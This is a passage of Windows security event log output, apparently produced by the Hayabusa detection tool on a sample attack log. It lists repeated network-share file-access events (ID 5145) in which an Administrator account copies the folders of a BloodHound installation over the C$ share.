\??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
